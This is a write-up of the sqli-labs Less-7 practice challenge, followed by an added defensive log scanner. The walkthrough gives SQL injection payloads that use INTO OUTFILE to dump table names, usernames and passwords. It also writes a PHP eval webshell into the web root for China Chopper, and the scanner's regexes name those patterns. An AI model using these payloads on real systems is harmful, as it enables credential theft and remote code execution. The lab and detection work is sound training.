## sqli-labs Less-7
http://localhost/sqli-labs-master/Less-7/?id=1
First, the usual check for whether the injection is numeric or character-based:
testing with `and 1=1` and `and 1=2` shows that it is not numeric.
Next, use `'` to test.
Analyzing the results: `'` gives an error response, `"` gives a normal response.
This indicates a `'` character-type injection.
But substituting `'--+` shows that
something is still missing before the comment.
Guessing with `)`,
`'))--+` is found to give a normal response.
The lab's title mentions dump into outfile,
so the vulnerability can probably be used to export data to a file.
So use:

```text
')) union select 1,2,3 into outfile "xixi.txt" --+
```

Even though the response shows an error,
you can see that it succeeded.
Next, we can begin to get the database name and user information:

```text
'))union select 1,2,table_name from information_schema.tables where table_schema='security' into outfile "xixi.txt"--+
'))union select 1,2,column_name from information_schema.columns where table_name='users' into outfile "xixi.txt"--+
'))union select 1,2,username from security.users into outfile "xixi.txt"--+
'))union select 1,2,password from security.users into outfile "xixi.txt"--+
```
#######
This challenge can also be solved by constructing a one-line webshell ("one-sentence Trojan"):

```text
'))union select 1,2, '<?php eval($_post["reader"])?>' into outfile "xixi.php"--+
'))union select 1,2, '<?php eval($_post[reader])?>' into outfile "D:/phpStudy/PHPTutorial/WWW/sqli-labs-master/less-7/xixi.php"--+
```

Then connect to it with China Chopper (the "Chinese kitchen knife").
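
A defender's view of the requests above, as an added example that is not part of the original write-up: a small scanner that decodes each query parameter from a web access log and flags the `union select`, `information_schema` and `into outfile` patterns this lab relies on. The log lines, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (shortened common log format); not taken from the page.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli-labs-master/Less-7/?id=1 HTTP/1.1" 200 706
127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /sqli-labs-master/Less-7/?id=1%27))%20union%20select%201,2,3%20into%20outfile%20%22xixi.txt%22--+ HTTP/1.1" 200 721
127.0.0.1 - - [01/Jan/2024:10:00:15 +0000] "GET /sqli-labs-master/Less-7/?id=1'))UNION/**/SELECT+1,2,username+FROM+security.users+INTO/**/OUTFILE+'x.txt'--+ HTTP/1.1" 200 721
127.0.0.1 - - [01/Jan/2024:10:00:20 +0000] "GET /search?q=how+to+select+an+outfile+name HTTP/1.1" 200 1532
"""

# Hypothetical rule set: each regex runs on the decoded, normalized parameter value.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "file_write": re.compile(r"\binto\s+(?:outfile|dumpfile)\b"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Undo simple evasions: inline comments used as spaces, mixed case, whitespace runs."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).lower()

def scan(log_text):
    """Return (line_number, parameter, matched_rule_names) for each suspicious parameter."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl percent-decodes values and turns '+' into a space.
        for name, value in parse_qsl(query, keep_blank_values=True):
            text = normalize(value)
            hits = sorted(rule for rule, rx in RULES.items() if rx.search(text))
            if hits:
                findings.append((line_no, name, hits))
    return findings

if __name__ == "__main__":
    for line_no, name, hits in scan(SAMPLE_LOG):
        print(f"line {line_no}: parameter {name!r} matched {', '.join(hits)}")
```

On the database side, `INTO OUTFILE` only works when the MySQL account has the `FILE` privilege and `secure_file_priv` permits the target directory, so revoking `FILE` from the web application's account and restricting `secure_file_priv` removes this write primitive even if the injection itself remains.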